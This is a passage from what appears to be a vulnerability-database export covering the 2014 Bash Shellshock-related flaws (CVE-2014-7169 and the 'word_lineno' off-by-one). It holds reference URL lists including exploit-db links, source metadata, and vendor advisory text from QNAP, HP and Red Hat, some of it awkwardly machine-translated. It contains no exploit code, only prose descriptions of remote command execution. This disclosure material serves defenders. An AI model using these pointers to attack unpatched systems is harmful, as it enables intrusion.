"http://secunia.com/advisories/60193" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61855" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60325" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61312" }, { "trust": 1.1, "url": "https://support.citrix.com/article/ctx200217" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004879" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61128" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61313" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61287" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61129" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686479" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685541" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61471" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61328" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58200" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61857" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61065" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61550" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686494" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60044" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686445" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021361" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60024" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60063" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61291" }, { "trust": 1.1, "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk102673\u0026src=securityalerts" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60433" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383244821813\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2014-10/msg00025.html" }, { "trust": 1.1, "url": "http://jvn.jp/en/jp/jvn55667175/index.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383138121313\u0026w=2" }, { "trust": 1.1, "url": "http://www.qnap.com/i/en/support/con_show.php?cid=61" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383026420882\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2014-10/msg00023.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383196021590\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383353622268\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383304022067\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141450491804793\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383081521087\u0026w=2" }, { "trust": 1.1, "url": "http://jvndb.jvn.jp/jvndb/jvndb-2014-000126" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686447" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1354.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383465822787\u0026w=2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61873" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141577241923505\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141576728022234\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141577297623641\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141577137423233\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141585637922673\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141694386919794\u0026w=2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/62343" }, { "trust": 1.1, "url": "http://secunia.com/advisories/62312" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142358026505815\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142358078406056\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142113462216480\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141879528318582\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142721162228379\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142805027510172\u0026w=2" }, { "trust": 1.1, "url": "http://advisories.mageia.org/mgasa-2014-0393.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:164" }, { "trust": 1.1, "url": "http://secunia.com/advisories/62228" }, { "trust": 1.1, "url": "https://access.redhat.com/node/1200223" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59272" }, { "trust": 1.1, "url": "https://www.exploit-db.com/exploits/34879/" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-c04518183" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-c04497075" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/533593/100/0/threaded" }, { "trust": 1.1, "url": "https://help.ecostruxureit.com/display/public/uadco8x/struxureware+data+center+operation+software+vulnerability+fixes" }, { "trust": 1.1, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1008-security-advisory-0006" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7169" }, { "trust": 0.8, "url": "http://seclists.org/oss-sec/2014/q3/650" }, { "trust": 0.8, "url": "http://seclists.org/oss-sec/2014/q3/688" }, { "trust": 0.8, "url": "http://seclists.org/oss-sec/2014/q3/685" }, { "trust": 0.8, "url": "http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html" }, { "trust": 0.8, "url": "https://gist.github.com/anonymous/929d622f3b36b00c0be1" }, { "trust": 0.8, "url": "https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html" }, { "trust": 0.8, "url": "https://shellshocker.net/#" }, { "trust": 0.8, "url": "https://www.barracuda.com/support/techalerts" }, { "trust": 0.8, "url": "http://www.checkpoint.com/blog/protecting-shellshock/index.html" }, { "trust": 0.8, "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10044" }, { "trust": 0.8, "url": "https://www.debian.org/security/2014/dsa-3032" }, { "trust": 0.8, "url": "http://learn.extremenetworks.com/rs/extreme/images/vn-2014-001-%20gnu%20bash%20threats%20-cve-2014-7169%20rev01.pdf" }, { "trust": 0.8, "url": "http://fedoramagazine.org/shellshock-update-bash-packages-that-resolve-cve-2014-6271-and-cve-2014-7169-available/" }, { "trust": 0.8, "url": "http://www.fortiguard.com/advisory/fg-ir-14-030/" }, { "trust": 0.8, "url": "http://www.gentoo.org/security/en/glsa/glsa-201409-09.xml" }, { "trust": 0.8, "url": "http://alerts.hp.com/r?2.1.3kt.2zr.15ee22.l8mgqe..n.ghvs.8f9a.bw89mq%5f%5fdbosfqk0" }, { "trust": 0.8, "url": "http://kb.juniper.net/jsa10648" }, { "trust": 0.8, "url": "http://jpn.nec.com/security-info/av14-003.html" }, { "trust": 0.8, "url": "http://support.novell.com/security/cve/cve-2014-6271.html" }, { "trust": 0.8, "url": "https://www.suse.com/support/kb/doc.php?id=7015702" }, { "trust": 0.8, "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2014\u0026m=slackware-security.522193" }, { "trust": 0.8, "url": "http://www.ubuntu.com/usn/usn-2362-1/" }, { "trust": 0.8, "url": "http://kb.vmware.com/selfservice/microsites/search.do?language=en_us\u0026cmd=displaykc\u0026externalid=2090740" }, { "trust": 0.8, "url": "http://pkgsrc.se/files.php?messageid=20140925202832.9ad9c98@cvs.netbsd.org" }, { "trust": 0.7, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.7, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.7, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6271" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7186" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7187" }, { "trust": 0.3, "url": "http://www.gnu.org/software/bash/" }, { "trust": 0.3, "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk102673" }, { "trust": 0.3, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=kb83017" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_bash" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html" }, { "trust": 0.3, "url": "http://seclists.org/oss-sec/2014/q3/735" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_vulnerabilities_in_bash_affect_certain_qlogic_products_that_ibm_resells_for_bladecenter_and_flex_system_products_cve_2014_6271_c" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-372538.htm" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html?ref=rss" }, { "trust": 0.3, "url": "http://googlechromereleases.blogspot.com/2014/10/stable-channel-update-for-chrome-os.html" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004932" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686433" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1021361" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686494" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686445" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004903" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004928" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004911" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686479" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04497075" }, { "trust": 0.3, "url": "http://seclists.org/fulldisclosure/2014/oct/25" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04552143" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10661\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183066" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183009" }, { "trust": 0.3, "url": "https://lists.gnu.org/archive/html/bug-bash/2014-10/msg00000.html" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/bluu-9paps5" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183222" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479398" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479402" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479492" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04475942" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04488200" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04478866" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04477872" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479536" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04540692" }, { "trust": 0.3, "url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04561445" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471546" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471538" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04497042" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04512907 " }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/76" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04558068" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/77" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04479974" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487558" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487573" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04496383" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/bluu-9paptm" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/bluu-9paptz" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/1a2e5-5116a33c2fb27/cert_security_mini-_bulletin_xrx15k_for_77xx_r15-03_v1.0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2b8d8-513128526dd97/cert_security_mini-_bulletin_xrx15m_for_wc75xx_v1_1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2eeef-51056e459c6d8/cert_security_mini-_bulletin_xrx15h_for_p7800_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2a20e-5105457a515cc/cert_security_mini-_bulletin_xrx15e_for_wc57xx_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2a901-510567b876a35/cert_security_mini-_bulletin_xrx15g_for_p6700_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/29a7e-50e49f9c009f9/cert_security_mini_bulletin_xrx14g_for_77xx_v1.1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/1a7a1-50f12e334b734/cert_security_mini-_bulletin_xrx14h_for_wc59xx_v1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2df3c-51055b159fd50/cert_security_mini_bulletin_xrx15f_for_connectkey_1.5_v1-01.pdf" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-377648.htm" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686447" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004982" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004879" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685873" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686132" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096533" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686024" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686037" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685733" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686171" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686098" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685875" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020272" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685541" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004905" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685673" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685837" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687971" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685691" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004933" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096503" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004945" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183088" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6277" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6278" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/78.html" }, { "trust": 0.1, "url": "https://github.com/chefrycar/cookbook_shellshock" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-7169" }, { "trust": 0.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-269-01a" }, { "trust": 0.1, "url": "https://www.exploit-db.com/exploits/36933/" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/km01194433" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7196" }, { "trust": 0.1, "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsea" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-7169" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://www.hp.com/support/eslg3" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-7169.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-7186.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-7187.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" } ], "sources": [ { "db": "CERT/CC", "id": "VU#252743" }, { "db": "VULMON", "id": "CVE-2014-7169" }, { "db": "BID", "id": "70154" }, { "db": "PACKETSTORM", "id": "128665" }, { "db": "PACKETSTORM", "id": "130336" }, { "db": "PACKETSTORM", "id": "128753" }, { "db": "PACKETSTORM", "id": "128433" }, { "db": "PACKETSTORM", "id": "129069" }, { "db": "PACKETSTORM", "id": "131275" }, { "db": "PACKETSTORM", "id": "128456" }, { "db": "PACKETSTORM", "id": "128546" }, { "db": "PACKETSTORM", "id": "128509" }, { "db": "NVD", "id": "CVE-2014-7169" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#252743" }, { "db": "VULMON", "id": "CVE-2014-7169" }, { "db": "BID", "id": "70154" }, { "db": "PACKETSTORM", "id": "128665" }, { "db": "PACKETSTORM", "id": "130336" }, { "db": "PACKETSTORM", "id": "128753" }, { "db": "PACKETSTORM", "id": "128433" }, { "db": "PACKETSTORM", "id": "129069" }, { "db": "PACKETSTORM", "id": "131275" }, { "db": "PACKETSTORM", "id": "128456" }, { "db": "PACKETSTORM", "id": "128546" }, { "db": "PACKETSTORM", "id": "128509" }, { "db": "NVD", "id": "CVE-2014-7169" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-09-25T00:00:00", "db": "CERT/CC", "id": "VU#252743" }, { "date": "2014-09-25T00:00:00", "db": "VULMON", "id": "CVE-2014-7169" }, { "date": "2014-09-25T00:00:00", "db": "BID", "id": "70154" }, { "date": "2014-10-14T23:07:02", "db": "PACKETSTORM", "id": "128665" }, { "date": "2015-02-10T17:43:27", "db": "PACKETSTORM", "id": "130336" }, { "date": "2014-10-20T13:55:00", "db": "PACKETSTORM", "id": "128753" }, { "date": "2014-09-26T14:38:58", "db": "PACKETSTORM", "id": "128433" }, { "date": "2014-11-12T18:13:47", "db": "PACKETSTORM", "id": "129069" }, { "date": "2015-04-03T15:46:45", "db": "PACKETSTORM", "id": "131275" }, { "date": "2014-09-27T16:45:44", "db": "PACKETSTORM", "id": "128456" }, { "date": "2014-10-03T23:32:04", "db": "PACKETSTORM", "id": "128546" }, { "date": "2014-10-01T11:11:00", "db": "PACKETSTORM", "id": "128509" }, { "date": "2014-09-25T01:55:04.367000", "db": "NVD", "id": "CVE-2014-7169" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-04-14T00:00:00", "db": "CERT/CC", "id": "VU#252743" }, { "date": "2021-11-17T00:00:00", "db": "VULMON", "id": "CVE-2014-7169" }, { "date": "2015-11-03T19:52:00", "db": "BID", "id": "70154" }, { "date": "2021-11-17T22:15:37.063000", "db": "NVD", "id": "CVE-2014-7169" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "BID", "id": "70154" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "GNU Bash shell executes commands in exported functions in environment variables", "sources": [ { "db": "CERT/CC", "id": "VU#252743" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Boundary Condition Error", "sources": [ { "db": "BID", "id": "70154" } ], "trust": 0.3 } }
var-201409-1148
Vulnerability from variot
Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue. QNAP Systems, Inc. Provided by QTS teeth, Turbo NAS for OS is. QTS for, GNU Bash Vulnerability (JVNVU#97219505) caused by OS Command injection vulnerability (CWE-78) Exists. This vulnerability information is based on the Information Security Early Warning Partnership. IPA Report to JPCERT/CC Coordinated with the developer. Reporter : University of Electro-Communications Wakisaka Yuki MrAny application permission OS The command may be executed. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. GNU Bash 3.2 and later are vulnerable; prior versions may also be affected.
HP StoreEver ESL E-series Tape Library
- Disable DHCP and only use static IP addressing.
HP Virtual Library System (VLS)
- Disable DHCP and only use static IP addressing.
This vulnerability allows users that have been granted access to a shell script to escalate privilege and execute unrestricted commands at the same security level as the Bash script.
Open the PXE Configuration Utility on the HP Insight Control server deployment window Select Linux Managed from the Boot Menu options Click the Edit button. Clicking the Edit button displays the Edit Shared Menu Option window Uncheck the x86 option in Operating System and Processor Options and click OK. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: bash security update Advisory ID: RHSA-2014:1311-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1311.html Issue date: 2014-09-26 CVE Names: CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 =====================================================================
- Summary:
Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 Extended Update Support.
Red Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AS (v. 4 ELS) - i386, ia64, x86_64 Red Hat Enterprise Linux AUS (v. 6.2 server) - x86_64 Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4) - x86_64 Red Hat Enterprise Linux ES (v. 4 ELS) - i386, x86_64 Red Hat Enterprise Linux EUS (v. 5.9 server) - i386, ia64, ppc, s390x, x86_64 Red Hat Enterprise Linux HPC Node EUS (v. 6.4) - x86_64 Red Hat Enterprise Linux LL (v. 5.6 server) - i386, ia64, x86_64 Red Hat Enterprise Linux Server EUS (v. 6.4) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 6.4) - i386, ppc64, s390x, x86_64
- Description:
The GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. (CVE-2014-7169)
Applications which directly create Bash functions as environment variables need to be made aware of the changes to the way names are handled by this update. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223
Note: Docker users are advised to use "yum update" within their containers, and to commit the resulting changes.
For additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.
All bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
- Package List:
Red Hat Enterprise Linux AS (v. 4 ELS):
Source: bash-3.0-27.el4.4.src.rpm
i386: bash-3.0-27.el4.4.i386.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm
ia64: bash-3.0-27.el4.4.i386.rpm bash-3.0-27.el4.4.ia64.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm bash-debuginfo-3.0-27.el4.4.ia64.rpm
x86_64: bash-3.0-27.el4.4.x86_64.rpm bash-debuginfo-3.0-27.el4.4.x86_64.rpm
Red Hat Enterprise Linux ES (v. 4 ELS):
Source: bash-3.0-27.el4.4.src.rpm
i386: bash-3.0-27.el4.4.i386.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm
x86_64: bash-3.0-27.el4.4.x86_64.rpm bash-debuginfo-3.0-27.el4.4.x86_64.rpm
Red Hat Enterprise Linux LL (v. 5.6 server):
Source: bash-3.2-24.el5_6.2.src.rpm
i386: bash-3.2-24.el5_6.2.i386.rpm bash-debuginfo-3.2-24.el5_6.2.i386.rpm
ia64: bash-3.2-24.el5_6.2.i386.rpm bash-3.2-24.el5_6.2.ia64.rpm bash-debuginfo-3.2-24.el5_6.2.i386.rpm bash-debuginfo-3.2-24.el5_6.2.ia64.rpm
x86_64: bash-3.2-24.el5_6.2.x86_64.rpm bash-debuginfo-3.2-24.el5_6.2.x86_64.rpm
Red Hat Enterprise Linux EUS (v. 5.9 server):
Source: bash-3.2-32.el5_9.3.src.rpm
i386: bash-3.2-32.el5_9.3.i386.rpm bash-debuginfo-3.2-32.el5_9.3.i386.rpm
ia64: bash-3.2-32.el5_9.3.i386.rpm bash-3.2-32.el5_9.3.ia64.rpm bash-debuginfo-3.2-32.el5_9.3.i386.rpm bash-debuginfo-3.2-32.el5_9.3.ia64.rpm
ppc: bash-3.2-32.el5_9.3.ppc.rpm bash-debuginfo-3.2-32.el5_9.3.ppc.rpm
